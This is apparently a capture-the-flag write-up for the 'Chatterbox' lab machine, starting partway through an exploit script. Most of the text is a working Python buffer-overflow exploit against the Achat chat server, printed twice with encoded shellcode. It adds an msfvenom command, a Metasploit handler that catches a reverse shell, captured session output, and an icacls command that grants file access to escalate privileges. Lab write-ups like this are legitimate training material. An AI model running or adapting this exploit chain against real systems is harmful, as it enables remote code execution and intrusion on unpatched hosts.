buf += "\x72\x6b\x51\x48\x6d\x4c\x6b\x51\x67\x63\x52\x6b\x49"
buf += "\x74\x72\x6b\x4d\x31\x7a\x30\x44\x49\x51\x34\x6e\x44"
buf += "\x4b\x74\x61\x4b\x51\x4b\x4f\x71\x51\x49\x71\x4a\x52"
buf += "\x31\x49\x6f\x69\x50\x31\x4f\x51\x4f\x6e\x7a\x34\x4b"
buf += "\x6a\x72\x38\x6b\x44\x4d\x71\x4d\x50\x6a\x59\x71\x64"
buf += "\x4d\x35\x35\x65\x62\x4b\x50\x49\x70\x4b\x50\x52\x30"
buf += "\x32\x48\x6c\x71\x64\x4b\x72\x4f\x51\x77\x59\x6f\x79"
buf += "\x45\x45\x6b\x48\x70\x75\x65\x35\x52\x30\x56\x72\x48"
buf += "\x33\x76\x35\x45\x37\x4d\x63\x6d\x49\x6f\x37\x65\x6d"
buf += "\x6c\x6a\x66\x31\x6c\x79\x7a\x51\x70\x4b\x4b\x67\x70"
buf += "\x53\x45\x6d\x35\x55\x6b\x31\x37\x4e\x33\x32\x52\x30"
buf += "\x6f\x42\x4a\x6d\x30\x50\x53\x79\x6f\x37\x65\x70\x63"
buf += "\x53\x31\x72\x4c\x30\x63\x4c\x6e\x70\x65\x32\x58\x50"
buf += "\x65\x6d\x30\x41\x41"

# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = (‘192.168.91.130’, 9256)

fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 – len(buf))
p += "\x00" + "A"*10 + "\x00"

print "—-&amp;amp;gt;{P00F}!"
i=0
while i&amp;amp;lt;len(p):
if i &amp;amp;gt; 172000:
time.sleep(1.0)
sent = sock.sendto(p[i:(i+8192)], server_address)
i += sent
sock.close()
[/bash]

This POC appears to be aimed a triggering a buffer overflow. Before we can test it, we have to edit a couple of this:

1. The Hexcode is aimed at triggering the calculator (Calc.exe) instead of spawning a reverse shell. This is quite common for POC’s, but something to be taken into account. We can use msfvenom to create our own code.
2. The current server address is pointing at 192.168.91.130. You need to change this to the IP of the machine your are performing the attack from.

Lets start by generating some hexcode that we can use to setup a reverse shell. The POC already states which msfvenom comand was used to generate the payload:

[bash]
msfvenom -a x86 –platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b ‘\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff’ BufferRegister=EAX -f python&amp;lt;/pre&amp;gt;
[/bash]

Lets change this to something we can make work for ourselves:

[bash]&amp;lt;/pre&amp;gt;
#!/usr/bin/python
# Author KAhara MAnhara
# Achat 0.150 beta7 – Buffer Overflow
# Tested on Windows 7 32bit

import socket
import sys, time

# msfvenom -a x86 –platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b ‘\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9$
#Payload size: 512 bytes
buf = ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x59\x6c\x6b\x38\x55\x32"
buf += "\x69\x70\x4b\x50\x4b\x50\x71\x50\x75\x39\x47\x75\x4c"
buf += "\x71\x45\x70\x52\x44\x72\x6b\x72\x30\x50\x30\x44\x4b"
buf += "\x4e\x72\x7a\x6c\x42\x6b\x72\x32\x5a\x74\x72\x6b\x54"
buf += "\x32\x4b\x78\x7a\x6f\x46\x57\x30\x4a\x6c\x66\x6e\x51"
buf += "\x6b\x4f\x46\x4c\x6d\x6c\x31\x51\x71\x6c\x6b\x52\x6e"
buf += "\x4c\x6b\x70\x55\x71\x68\x4f\x4c\x4d\x49\x71\x36\x67"
buf += "\x6b\x32\x7a\x52\x30\x52\x72\x37\x34\x4b\x4f\x62\x4c"
buf += "\x50\x52\x6b\x6f\x5a\x6d\x6c\x32\x6b\x6e\x6c\x6a\x71"
buf += "\x73\x48\x48\x63\x4d\x78\x4a\x61\x57\x61\x6f\x61\x34"
buf += "\x4b\x30\x59\x4b\x70\x5a\x61\x76\x73\x42\x6b\x6e\x69"
buf += "\x4d\x48\x6b\x33\x6f\x4a\x70\x49\x72\x6b\x6d\x64\x74"
buf += "\x4b\x6a\x61\x36\x76\x4e\x51\x49\x6f\x36\x4c\x46\x61"
buf += "\x38\x4f\x4c\x4d\x49\x71\x39\x37\x6d\x68\x39\x50\x73"
buf += "\x45\x4b\x46\x49\x73\x71\x6d\x6b\x48\x4d\x6b\x71\x6d"
buf += "\x4b\x74\x61\x65\x57\x74\x62\x38\x72\x6b\x61\x48\x4d"
buf += "\x54\x6b\x51\x79\x43\x61\x56\x62\x6b\x4a\x6c\x70\x4b"
buf += "\x74\x4b\x70\x58\x6d\x4c\x6d\x31\x78\x53\x44\x4b\x7a"
buf += "\x64\x72\x6b\x4b\x51\x48\x50\x71\x79\x71\x34\x6f\x34"
buf += "\x6f\x34\x71\x4b\x71\x4b\x63\x31\x6e\x79\x6f\x6a\x70"
buf += "\x51\x39\x6f\x69\x50\x4f\x6f\x61\x4f\x71\x4a\x64\x4b"
buf += "\x6b\x62\x7a\x4b\x52\x6d\x6f\x6d\x53\x38\x4d\x63\x4d"
buf += "\x62\x6d\x30\x6d\x30\x43\x38\x54\x37\x51\x63\x4e\x52"
buf += "\x51\x4f\x4f\x64\x70\x68\x4e\x6c\x34\x37\x6b\x76\x6c"
buf += "\x47\x65\x39\x58\x68\x49\x6f\x5a\x30\x47\x48\x34\x50"
buf += "\x7a\x61\x6d\x30\x79\x70\x6d\x59\x37\x54\x70\x54\x4e"
buf += "\x70\x61\x58\x4b\x79\x71\x70\x32\x4b\x59\x70\x6b\x4f"
buf += "\x59\x45\x72\x4a\x6c\x4a\x63\x38\x5a\x6a\x69\x7a\x6e"
buf += "\x30\x6a\x78\x43\x38\x49\x72\x39\x70\x4c\x50\x62\x72"
buf += "\x51\x79\x6a\x46\x4e\x70\x30\x50\x32\x30\x72\x30\x31"

buf += "\x6b\x4f\x46\x4c\x6d\x6c\x31\x51\x71\x6c\x6b\x52\x6e"
buf += "\x4c\x6b\x70\x55\x71\x68\x4f\x4c\x4d\x49\x71\x36\x67"
buf += "\x6b\x32\x7a\x52\x30\x52\x72\x37\x34\x4b\x4f\x62\x4c"
buf += "\x50\x52\x6b\x6f\x5a\x6d\x6c\x32\x6b\x6e\x6c\x6a\x71"
buf += "\x73\x48\x48\x63\x4d\x78\x4a\x61\x57\x61\x6f\x61\x34"
buf += "\x4b\x30\x59\x4b\x70\x5a\x61\x76\x73\x42\x6b\x6e\x69"
buf += "\x4d\x48\x6b\x33\x6f\x4a\x70\x49\x72\x6b\x6d\x64\x74"
buf += "\x4b\x6a\x61\x36\x76\x4e\x51\x49\x6f\x36\x4c\x46\x61"
buf += "\x38\x4f\x4c\x4d\x49\x71\x39\x37\x6d\x68\x39\x50\x73"
buf += "\x45\x4b\x46\x49\x73\x71\x6d\x6b\x48\x4d\x6b\x71\x6d"
buf += "\x4b\x74\x61\x65\x57\x74\x62\x38\x72\x6b\x61\x48\x4d"
buf += "\x54\x6b\x51\x79\x43\x61\x56\x62\x6b\x4a\x6c\x70\x4b"
buf += "\x74\x4b\x70\x58\x6d\x4c\x6d\x31\x78\x53\x44\x4b\x7a"
buf += "\x64\x72\x6b\x4b\x51\x48\x50\x71\x79\x71\x34\x6f\x34"
buf += "\x6f\x34\x71\x4b\x71\x4b\x63\x31\x6e\x79\x6f\x6a\x70"
buf += "\x51\x39\x6f\x69\x50\x4f\x6f\x61\x4f\x71\x4a\x64\x4b"
buf += "\x6b\x62\x7a\x4b\x52\x6d\x6f\x6d\x53\x38\x4d\x63\x4d"
buf += "\x62\x6d\x30\x6d\x30\x43\x38\x54\x37\x51\x63\x4e\x52"
buf += "\x51\x4f\x4f\x64\x70\x68\x4e\x6c\x34\x37\x6b\x76\x6c"
buf += "\x47\x65\x39\x58\x68\x49\x6f\x5a\x30\x47\x48\x34\x50"
buf += "\x7a\x61\x6d\x30\x79\x70\x6d\x59\x37\x54\x70\x54\x4e"
buf += "\x70\x61\x58\x4b\x79\x71\x70\x32\x4b\x59\x70\x6b\x4f"
buf += "\x59\x45\x72\x4a\x6c\x4a\x63\x38\x5a\x6a\x69\x7a\x6e"
buf += "\x30\x6a\x78\x43\x38\x49\x72\x39\x70\x4c\x50\x62\x72"
buf += "\x51\x79\x6a\x46\x4e\x70\x30\x50\x32\x30\x72\x30\x31"
buf += "\x30\x50\x50\x6d\x70\x50\x50\x6f\x78\x69\x5a\x6c\x4f"
buf += "\x49\x4f\x59\x50\x39\x6f\x39\x45\x33\x67\x70\x6a\x4e"
buf += "\x30\x70\x56\x52\x37\x31\x58\x36\x39\x53\x75\x43\x44"
buf += "\x61\x51\x4b\x4f\x48\x55\x54\x45\x69\x30\x73\x44\x39"
buf += "\x7a\x4b\x4f\x70\x4e\x39\x78\x52\x55\x48\x6c\x67\x78"
buf += "\x71\x57\x6d\x30\x69\x70\x4b\x50\x50\x6a\x69\x70\x52"
buf += "\x4a\x59\x74\x50\x56\x62\x37\x31\x58\x6d\x32\x66\x79"
buf += "\x76\x68\x6f\x6f\x69\x6f\x49\x45\x51\x73\x6a\x58\x79"
buf += "\x70\x63\x4e\x4e\x56\x62\x6b\x4d\x66\x42\x4a\x71\x30"
buf += "\x52\x48\x6d\x30\x4a\x70\x79\x70\x6d\x30\x6f\x66\x32"
buf += "\x4a\x6d\x30\x73\x38\x32\x38\x44\x64\x4f\x63\x57\x75"
buf += "\x4b\x4f\x49\x45\x34\x53\x61\x43\x71\x5a\x59\x70\x50"
buf += "\x56\x70\x53\x52\x37\x62\x48\x4a\x62\x37\x69\x56\x68"
buf += "\x4f\x6f\x4b\x4f\x59\x45\x64\x43\x78\x78\x79\x70\x61"
buf += "\x6d\x4e\x48\x6f\x68\x71\x58\x59\x70\x61\x30\x6d\x30"
buf += "\x59\x70\x61\x5a\x59\x70\x32\x30\x61\x58\x6a\x6b\x6e"
buf += "\x4f\x5a\x6f\x50\x30\x59\x6f\x4a\x35\x32\x37\x61\x58"
buf += "\x74\x35\x62\x4e\x70\x4d\x4f\x71\x4b\x4f\x79\x45\x61"
buf += "\x4e\x6f\x6e\x39\x6f\x4a\x6c\x4b\x74\x7a\x6f\x44\x45"
buf += "\x74\x30\x69\x6f\x69\x6f\x4b\x4f\x6a\x49\x35\x4b\x59"
buf += "\x6f\x6b\x4f\x59\x6f\x6b\x51\x69\x33\x6c\x69\x48\x46"
buf += "\x63\x45\x79\x31\x66\x63\x65\x6b\x78\x70\x48\x35\x37"
buf += "\x32\x51\x46\x61\x5a\x4d\x30\x4e\x73\x49\x6f\x59\x45"
buf += "\x41\x41"

# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = (‘10.10.10.74’, 9256)

fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 – len(buf))
p += "\x00" + "A"*10 + "\x00"

print "—-&amp;gt;{P00F}!"
i=0
while i&amp;lt;len(p):
if i &amp;gt; 172000:
time.sleep(1.0)
sent = sock.sendto(p[i:(i+8192)], server_address)
i += sent
sock.close()
&amp;lt;pre&amp;gt;[/bash]

Setup a catcher for the reverse shell:

[bash]

msf > use exploit/multi/handler

msf exploit(multi/handler) > set PAYLOAD windows/shell/reverse_tcp

PAYLOAD => windows/shell/reverse_tcp

msf exploit(multi/handler) > set LHOST tun0

LHOST => tun0

msf exploit(multi/handler) > set LPORT 4242
LPORT => 4242

msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.16.X:4242

msf exploit(multi/handler) > [*] Encoded stage with x86/shikata_ga_nai

[*] Sending encoded stage (267 bytes) to 10.10.10.74

[*] Command shell session 1 opened (10.10.16.X:4242 -> 10.10.10.74:49178)

[/bash]

Aaaaaand:

[bash]

msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1…

Microsoft Windows [Version 6.1.7601]

Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32\ whoami

chatterbox\alfred

[/bash]

You can find the user key in the /Desktop folder.

Privilege Escalation

Now, for root. How to proceed? One of the first things I always check on a Windows machine are the (i)calcs settings. icalcs stands for Integrity Control and Access Control List. It is a Microsoft Windows native command line utilities capable of displaying and modifying the security descriptors on folders and files. An access control list is a list of permissions for securable object, such as a file or folder, that controls who can access it.

it seems that Alfred has ownership of the root flag, but cannot read it. By using icalcs, we can change this:

[bash]

icacls.exe root.txt /grant CHATTERBOX\Alfred:F

[/bash]

We can then browse to the Desktop folder of the administrator, where we find root.txt. Thus concludes Chatterbox.

Check out this awesome video by Ippsec. He also explores how to get the same results using Powershell Empire instead of Metasploit. Worth looking at!